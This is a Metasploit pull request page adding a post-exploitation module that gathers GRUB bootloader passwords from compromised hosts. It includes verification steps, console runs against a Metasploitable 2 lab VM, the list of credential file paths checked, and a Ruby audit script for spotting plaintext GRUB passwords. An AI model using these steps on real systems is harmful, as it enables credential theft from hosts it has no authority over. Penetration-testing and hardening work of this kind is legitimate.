
#11166 add gather grub passwords #12462

Merged
merged 2 commits into from Oct 21, 2019

Conversation

@taeber
Contributor

taeber commented Oct 16, 2019

This change adds a post module to collect passwords from GRUB configuration files.

It should fix #11166.

Vulnerable Application

Any UNIX-like system with a shell or meterpreter session using GRUB.

Verification Steps

  1. Get a shell or meterpreter session on some host.
  2. Do: use post/multi/gather/grub_creds
  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this on.
  4. Do: run
  5. If the system has readable GRUB configuration files containing a password, they will be printed out.

Options

  • FILENAME is a string that can be used to specify an additional file to check after the usual places.
  • VERBOSE is a boolean that, when set, will provide more details on what is being checked. (Note: this option is defined elsewhere in metasploit, but this module makes use of it.)

Scenarios

I tested against a Metasploitable 2 VM (running Ubuntu 8.04). After adding the line password topsecret to /boot/grub/menu.lst, I ran the post module.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/gather/grub_creds 
msf5 post(multi/gather/grub_creds) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf5 post(multi/gather/grub_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/grub_creds) > run

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > set VERBOSE true
VERBOSE => true
msf5 post(multi/gather/grub_creds) > set FILENAME /root/grub.cfg
FILENAME => /root/grub.cfg
msf5 post(multi/gather/grub_creds) > run

[*] Finding grub configuration files
[*] Checking /boot/grub/grub.conf
[*] /boot/grub/grub.conf not found or unreadable
[*] Checking /boot/grub/grub.cfg
[*] /boot/grub/grub.cfg not found or unreadable
[*] Checking /boot/grub/menu.lst
[+] /boot/grub/menu.lst:password topsecret
[*] Checking /etc/grub.conf
[*] /etc/grub.conf not found or unreadable
[*] Checking /etc/grub/grub.cfg
[*] /etc/grub/grub.cfg not found or unreadable
[*] Checking /etc/grub.d/00_header
[*] /etc/grub.d/00_header not found or unreadable
[*] Checking /mnt/sysimage/boot/grub.conf
[*] /mnt/sysimage/boot/grub.conf not found or unreadable
[*] Checking /mnt/boot/grub/grub.conf
[*] /mnt/boot/grub/grub.conf not found or unreadable
[*] Checking /rpool/boot/grub/grub.cfg
[*] /rpool/boot/grub/grub.cfg not found or unreadable
[*] Checking /root/grub.cfg
[*] /root/grub.cfg not found or unreadable
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > 

I also verified it works through meterpreter.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 2
[*] Starting interaction with 2...

meterpreter > run post/multi/gather/grub_creds 

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
meterpreter > 

Standards

  • I ran Rubocop on the code and verified there were no problems.
  • msftidy reports "[INFO] No CVE references found. Please check before you land!" which I ignored since there is no CVE associated with this.
  • Code is licensed under the MSF's license (BSD-3-clause).
  • Documentation added.
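The check the module performs (walk the well-known GRUB configuration locations, report lines that set a password), restated from the defender's side as an added audit example. This is example code written for this page, not the grub_creds module's own source: the path list is copied from the verbose run above, the directive forms are GRUB legacy ("password <secret>", "password --md5 <hash>") and GRUB2 ("password <user> <secret>", "password_pbkdf2 <user> <hash>"), and the two sample configs are constructed. Unlike the module, it separates plaintext directives (the only ones worth reporting as leaked credentials) from hashed ones, which is what a hardening review needs to know.

```ruby
# Added example, not the grub_creds module's own code: audit GRUB configuration
# text for password directives, separating plaintext secrets (what the module
# reports) from hashed ones. The path list mirrors the locations the module's
# verbose output checks; the sample configs below are constructed.

GRUB_CONFIG_PATHS = %w[
  /boot/grub/grub.conf
  /boot/grub/grub.cfg
  /boot/grub/menu.lst
  /etc/grub.conf
  /etc/grub/grub.cfg
  /etc/grub.d/00_header
  /mnt/sysimage/boot/grub.conf
  /mnt/boot/grub/grub.conf
  /rpool/boot/grub/grub.cfg
].freeze

# Classify one config line. Returns nil when the line carries no password
# directive, otherwise a hash with :kind (:plaintext or :hashed), :directive
# and the stripped :line. Comments and blank lines are ignored.
def classify_grub_line(line)
  stripped = line.strip
  return nil if stripped.empty? || stripped.start_with?('#')

  case stripped
  when /\Apassword_pbkdf2\s+\S+\s+grub\.pbkdf2\./
    # GRUB2: password_pbkdf2 <user> grub.pbkdf2.sha512.<iters>.<salt>.<hash>
    { kind: :hashed, directive: 'password_pbkdf2', line: stripped }
  when /\Apassword\s+--md5\s+\S+/
    # GRUB legacy (menu.lst): password --md5 <md5crypt hash>
    { kind: :hashed, directive: 'password --md5', line: stripped }
  when /\Apassword\s+\S+/
    # GRUB legacy "password <secret>" or GRUB2 "password <user> <secret>"
    { kind: :plaintext, directive: 'password', line: stripped }
  end
end

# Audit the text of one config file. Each finding records the path and the
# 1-based line number so it can be reported the way the module does
# ("/boot/grub/menu.lst:password topsecret").
def audit_grub_config(text, path)
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    finding = classify_grub_line(line)
    findings << finding.merge(path: path, lineno: lineno) if finding
  end
  findings
end

# Audit the well-known locations on the local host, skipping files that are
# missing or unreadable (the module reports those as "not found or unreadable").
def audit_grub_files(paths = GRUB_CONFIG_PATHS)
  paths.select { |p| File.file?(p) && File.readable?(p) }
       .flat_map { |p| audit_grub_config(File.read(p), p) }
end

# Format a finding as "path:line", like the module's [+] output, plus a verdict.
def format_finding(finding)
  verdict = if finding[:kind] == :plaintext
              'PLAINTEXT password, replace with a hashed directive'
            else
              'hashed, ok'
            end
  "#{finding[:path]}:#{finding[:line]}  (#{verdict})"
end

# Constructed sample modelled on the PR scenario: a GRUB legacy menu.lst
# carrying a plaintext password line.
SAMPLE_MENU_LST = <<~CFG
  # constructed sample
  default 0
  timeout 5
  password topsecret
  title Ubuntu 8.04
  root (hd0,0)
CFG

# Constructed GRUB2 fragment using the hashed form (placeholder salt and hash).
SAMPLE_GRUB_CFG = <<~CFG
  set superusers="root"
  password_pbkdf2 root grub.pbkdf2.sha512.10000.PLACEHOLDERSALT.PLACEHOLDERHASH
CFG

if __FILE__ == $PROGRAM_NAME
  samples = [['/boot/grub/menu.lst', SAMPLE_MENU_LST],
             ['/boot/grub/grub.cfg', SAMPLE_GRUB_CFG]]
  samples.each do |path, text|
    audit_grub_config(text, path).each { |f| puts format_finding(f) }
  end
end
```

Running the file prints one plaintext finding for the constructed menu.lst and one hashed finding for the GRUB2 fragment; audit_grub_files scans the real locations on the host it runs on, and a plaintext finding there is the condition this module exists to exploit, so the fix is to move to the hashed directive for the bootloader in use.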
@busterb busterb self-assigned this Oct 21, 2019
@busterb busterb added the module label Oct 21, 2019
@busterb busterb changed the title from "11166 add gather grub passwords" to "#11166 add gather grub passwords" Oct 21, 2019
@busterb

Member

busterb commented Oct 21, 2019

I can't say I've seen grub in practice on anything other than a Linux machine, but this looks reasonable. Thanks @taeber

busterb added a commit that referenced this pull request Oct 21, 2019
@busterb busterb merged commit c92ea2b into rapid7:master Oct 21, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@busterb

Member

busterb commented Oct 21, 2019

Release Notes

This adds a post exploitation module for extracting credentials from a GRUB configuration file.

msjenkins-r7 added a commit that referenced this pull request Oct 21, 2019
@busterb busterb mentioned this pull request Oct 21, 2019